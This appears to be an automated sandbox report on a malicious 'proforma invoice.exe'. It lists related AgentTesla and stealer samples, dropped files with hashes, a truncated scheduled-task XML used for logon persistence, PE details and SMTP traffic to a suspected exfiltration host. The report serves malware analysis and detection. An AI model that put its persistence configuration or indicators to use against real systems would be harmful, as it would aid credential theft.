	lC7L7oBBMC.exe	Get hash	malicious	AgentTesla	Browse	46.175.148.58
	OHScaqAPjt.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	46.175.148.58
	RFQ ENQ186 OI REQUIRE RATE.exe	Get hash	malicious	AgentTesla	Browse	46.175.148.58
	v58HgfB8Af.exe	Get hash	malicious	AgentTesla	Browse	46.175.148.58
	l6F8Xgr0Ov.exe	Get hash	malicious	AgentTesla	Browse	46.175.148.58
	SPlVyHiGOz.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	46.175.148.58
	2bOizaPPDC.exe	Get hash	malicious	AgentTesla	Browse	46.175.148.58
api.ipify.org	x.ps1	Get hash	malicious	PureLog Stealer, Quasar	Browse	104.26.12.205
	file.exe	Get hash	malicious	Quasar	Browse	104.26.13.205
	Xeno Executor.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.13.205
	file.exe	Get hash	malicious	Amadey, CredGrabber, LummaC Stealer, Meduza Stealer, Stealc, Vidar	Browse	172.67.74.152
	file.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	malware.exe	Get hash	malicious	Targeted Ransomware, TrojanRansom	Browse	172.67.74.152
	Overdue_payment.pdf.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	TECHNICAL SPECIFICATIONS.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	Shipping Documents 72908672134.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	980001672 PPR for 30887217.scr.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
s-part-0035.t-0009.t-msedge.net	x.ps1	Get hash	malicious	PureLog Stealer, Quasar	Browse	13.107.246.63
	fnZWGb4PEJ.exe	Get hash	malicious	Unknown	Browse	13.107.246.63
	file.exe	Get hash	malicious	AgentTesla	Browse	13.107.246.63
	6fW0GedR6j.xls	Get hash	malicious	Unknown	Browse	13.107.246.63
	Transferencia.lnk	Get hash	malicious	XenoRAT	Browse	13.107.246.63
	BUNKER INVOICE MV SUN OCEAN.pdf.vbs	Get hash	malicious	GuLoader	Browse	13.107.246.63
	Bunker_STS_pdf.vbs	Get hash	malicious	GuLoader	Browse	13.107.246.63
	file.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.246.63
	file.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.246.63
	file.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.246.63

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ASLAGIDKOM-NETUA	Overdue_payment.pdf.exe	Get hash	malicious	AgentTesla	Browse	46.175.148.58
	PO for fabric forecast.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	46.175.148.58
	980001672 PPR for 30887217.scr.exe	Get hash	malicious	AgentTesla	Browse	46.175.148.58
	lC7L7oBBMC.exe	Get hash	malicious	AgentTesla	Browse	46.175.148.58
	OHScaqAPjt.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	46.175.148.58
	RFQ ENQ186 OI REQUIRE RATE.exe	Get hash	malicious	AgentTesla	Browse	46.175.148.58
	v58HgfB8Af.exe	Get hash	malicious	AgentTesla	Browse	46.175.148.58
	l6F8Xgr0Ov.exe	Get hash	malicious	AgentTesla	Browse	46.175.148.58
	SPlVyHiGOz.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	46.175.148.58
	2bOizaPPDC.exe	Get hash	malicious	AgentTesla	Browse	46.175.148.58
CLOUDFLARENETUS	UBS20240190101.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	Request for Quotation New collaboration.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	172.67.177.134
	REQUEST FOR QUOATION AND PRICES 01306-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.67.152
	http://74.50.69.234/	Get hash	malicious	Unknown	Browse	104.18.95.41
	file.exe	Get hash	malicious	Amadey, Credential Flusher, DarkVision Rat, LummaC Stealer, Stealc	Browse	104.21.16.9
	http://metrics.gocloudmaps.com	Get hash	malicious	Unknown	Browse	172.67.137.184
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	Msig Insurance Europe.pdf	Get hash	malicious	Unknown	Browse	104.18.69.40
	download.ps1	Get hash	malicious	Unknown	Browse	104.20.22.46
	x.ps1	Get hash	malicious	PureLog Stealer, Quasar	Browse	104.26.12.205

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Request for Quotation New collaboration.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.26.13.205
	REQUEST FOR QUOATION AND PRICES 01306-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.26.13.205
	file.exe	Get hash	malicious	Amadey, Credential Flusher, DarkVision Rat, LummaC Stealer, Stealc	Browse	104.26.13.205
	file.exe	Get hash	malicious	DarkVision Rat, Xmrig	Browse	104.26.13.205
	cllmxIZWcQ.lnk	Get hash	malicious	Unknown	Browse	104.26.13.205
	qhjKN40R2Q.lnk	Get hash	malicious	Unknown	Browse	104.26.13.205
	TRANSFERENCIA COMPROBANTES.lnk	Get hash	malicious	XenoRAT	Browse	104.26.13.205
	TRANSFERENCIA COMPROBANTES.lnk	Get hash	malicious	Unknown	Browse	104.26.13.205
	TRANSFERENCIA COMPROBANTES.lnk	Get hash	malicious	Unknown	Browse	104.26.13.205
	TRANSFERENCIA COMPROBANTES.lnk	Get hash	malicious	XenoRAT	Browse	104.26.13.205

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	26304
Entropy (8bit):	5.728580444753519
Encrypted:	false
SSDEEP:	768:Oqg4W+ZQkoaypXqSmFUJH2crgnfEVumyGDwwcIQV:jW3pXqSCUR2cOEd5RM
MD5:	50024929C538B5AB763DB8AEE6F753A5
SHA1:	31D804687B0482474D5F2712283143862512B51D
SHA-256:	80E6E02C40F3DE7C9DA0853CBF8D9D89C04391F4757D7400E44719A6BD641F5E
SHA-512:	B84C005C6EC1D6576DEE66BFE1213EA4741B5A4D8DDAB72069F89B9E38FF7BE650FD793CE2FBBB74264E80D9F600DEE3A15530A12E36A5746FB61118BB6107E0
Malicious:	false
Preview:	@...e...........g......./.%...........c..............@..........H...............o..b~.D.poM...Q..... .Microsoft.PowerShell.ConsoleHostD...............E...y.BG.\..............System.Management.Automation4...............<."..Ke@...j..........System.Core.0.................Vn.F..kLsw..........System..4.................%...K... ...........System.Xml..L.................gQ?O.....x5.\|.....#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4..................~..2K..}...0".......System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...D....................+.H..!...e........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3pv35m4h.yn0.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3vkkigcc.cq2.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ccx4dkv2.dgt.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cm2cvgql.1nf.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hl5dwkwo.kqf.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hv0mtdfd.145.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m4ddlut4.a13.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pgsxzusf.uej.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp4844.tmp

Download File

Process:	C:\Users\user\Desktop\proforma invoice.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1572
Entropy (8bit):	5.119903988570312
Encrypted:	false
SSDEEP:	24:2di4+S2qht31ly1mKUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtDxvn:cge5gYrFdOFzOzN33ODOiDdKrsuT9v
MD5:	E69EBBBF31E3D72632EFF76CD3B4E7EF
SHA1:	8BC0C1B7CA1D8C893958E53723660FFB82B46523
SHA-256:	51523E670A68175DC1477A5EE2DE992C79CF27238855594CC8B77E4D98A70DED
SHA-512:	F242720E17E2E01E0B5496BC08FA178C9C1F0F4F1F5C3C5E2806B3FB10FE0BE2A4FADE2F04B58552A7493F14DE2D3EE0BBC57891A1BC9AF14156938C48EE6413
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Local\Temp\tmp6458.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\CGWlZD.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1572
Entropy (8bit):	5.119903988570312
Encrypted:	false
SSDEEP:	24:2di4+S2qht31ly1mKUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtDxvn:cge5gYrFdOFzOzN33ODOiDdKrsuT9v
MD5:	E69EBBBF31E3D72632EFF76CD3B4E7EF
SHA1:	8BC0C1B7CA1D8C893958E53723660FFB82B46523
SHA-256:	51523E670A68175DC1477A5EE2DE992C79CF27238855594CC8B77E4D98A70DED
SHA-512:	F242720E17E2E01E0B5496BC08FA178C9C1F0F4F1F5C3C5E2806B3FB10FE0BE2A4FADE2F04B58552A7493F14DE2D3EE0BBC57891A1BC9AF14156938C48EE6413
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Roaming\CGWlZD.exe

Download File

Process:	C:\Users\user\Desktop\proforma invoice.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	953344
Entropy (8bit):	7.463818185002269
Encrypted:	false
SSDEEP:	12288:LMfXt5laMJmsmcb9oI527EPDAivHaS9MeoGD16jeEhAQdSZI3qgaXLVVHtF:QDFmm9oD0e9gothAhHF
MD5:	4CD97C3AF5DC22901FAE8C5851719EDE
SHA1:	EE483928AF409DC7C12265A631F04A324793C2DB
SHA-256:	B46E55DB0693853F1F96A8BA2BAAD879F4E700DB1C976A4041427ED221538922
SHA-512:	912CD83CA5C37913DF1450367B41DF30AE12575D19FDE1D137A6337481489C5E1A3B6A260D06C35EE8CBEE3A7251161D3D344534883BFB5B25F964AB63171137
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 66%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jQg..............0.................. ........@.. ....................................@.....................................S.......0............................................................................ ............... ..H............text...$.... ...................... ..`.rsrc...0...........................@..@.reloc..............................@..B........................H........!..........9...0....1..........................................[......S...M.7.=..A....c..+..%.^3G.+M.[O..:`S..iF........L..[....iFp.q.+.UC.C$.8j 9...G,f...3.*..m.s'.5......o;.....=Nb.....3...hD.z.4.M1.BIf...S@.a_.ty.L.V6L`..9c...q.,9H.P.:.`...'c. ..Z.'....RI...#.d:.@......Tg....(."...N....$....%...C4...H....9.]P\..Q........u..\...?v..o..`..l...?q."../1...z.c[.2'...Sh...X....iN0.#'.[...H..;..S..-.......h......_N.5T......vl..Hz....S..........

C:\Users\user\AppData\Roaming\CGWlZD.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\proforma invoice.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.463818185002269
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	proforma invoice.exe
File size:	953'344 bytes
MD5:	4cd97c3af5dc22901fae8c5851719ede
SHA1:	ee483928af409dc7c12265a631f04a324793c2db
SHA256:	b46e55db0693853f1f96a8ba2baad879f4e700db1c976a4041427ed221538922
SHA512:	912cd83ca5c37913df1450367b41df30ae12575d19fde1d137a6337481489c5e1a3b6a260d06c35ee8cbee3a7251161d3d344534883bfb5b25f964ab63171137
SSDEEP:	12288:LMfXt5laMJmsmcb9oI527EPDAivHaS9MeoGD16jeEhAQdSZI3qgaXLVVHtF:QDFmm9oD0e9gothAhHF
TLSH:	6E152607692CA4BECE36973E45109CF4A1F41C9D428AB20257BA7D7EF83D4624D0F96E
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jQg..............0.................. ........@.. ....................................@................................

File Icon


Icon Hash:	2946e68e96b3ca4d

Static PE Info

General

Entrypoint:	0x4bf01e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x67516A8D [Thu Dec 5 08:55:41 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbefc8	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc0000	0x2b530	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xec000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xbd024	0xbd200	5ca2af573535f92074609ba787a3a895	False	0.8810297732154659	data	7.708817624872848	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xc0000	0x2b530	0x2b600	1564cfc53c90433aa171e2c4e503849a	False	0.2084102575648415	data	5.10778408228168	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xec000	0xc	0x200	352393f0f624868eb20ad003fbee8496	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xc0298	0x3751	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9929383518113127
RT_ICON	0xc39ec	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	0.0891251626641429
RT_ICON	0xd4214	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	0.13335610678999368
RT_ICON	0xdd6bc	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	0.16816081330868762
RT_ICON	0xe2b44	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	0.15594000944733113
RT_ICON	0xe6d6c	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	0.23392116182572614
RT_ICON	0xe9314	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	0.274624765478424
RT_ICON	0xea3bc	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	0.41885245901639345
RT_ICON	0xead44	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	0.5
RT_GROUP_ICON	0xeb1ac	0x84	data	0.7045454545454546
RT_GROUP_ICON	0xeb230	0x14	data	1.05
RT_VERSION	0xeb244	0x2e8	data	0.43413978494623656

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 9, 2024 08:33:30.524353981 CET	49728	443	192.168.2.3	104.26.13.205
Dec 9, 2024 08:33:30.524389982 CET	443	49728	104.26.13.205	192.168.2.3
Dec 9, 2024 08:33:30.524462938 CET	49728	443	192.168.2.3	104.26.13.205
Dec 9, 2024 08:33:30.534476042 CET	49728	443	192.168.2.3	104.26.13.205
Dec 9, 2024 08:33:30.534492016 CET	443	49728	104.26.13.205	192.168.2.3
Dec 9, 2024 08:33:31.750580072 CET	443	49728	104.26.13.205	192.168.2.3
Dec 9, 2024 08:33:31.750673056 CET	49728	443	192.168.2.3	104.26.13.205
Dec 9, 2024 08:33:31.753621101 CET	49728	443	192.168.2.3	104.26.13.205
Dec 9, 2024 08:33:31.753634930 CET	443	49728	104.26.13.205	192.168.2.3
Dec 9, 2024 08:33:31.753977060 CET	443	49728	104.26.13.205	192.168.2.3
Dec 9, 2024 08:33:31.822634935 CET	49728	443	192.168.2.3	104.26.13.205
Dec 9, 2024 08:33:31.863337040 CET	443	49728	104.26.13.205	192.168.2.3
Dec 9, 2024 08:33:32.186563015 CET	443	49728	104.26.13.205	192.168.2.3
Dec 9, 2024 08:33:32.186642885 CET	443	49728	104.26.13.205	192.168.2.3
Dec 9, 2024 08:33:32.186695099 CET	49728	443	192.168.2.3	104.26.13.205
Dec 9, 2024 08:33:32.197910070 CET	49728	443	192.168.2.3	104.26.13.205
Dec 9, 2024 08:33:33.204963923 CET	49736	25	192.168.2.3	46.175.148.58
Dec 9, 2024 08:33:34.308547974 CET	49736	25	192.168.2.3	46.175.148.58
Dec 9, 2024 08:33:34.830617905 CET	49742	443	192.168.2.3	104.26.13.205
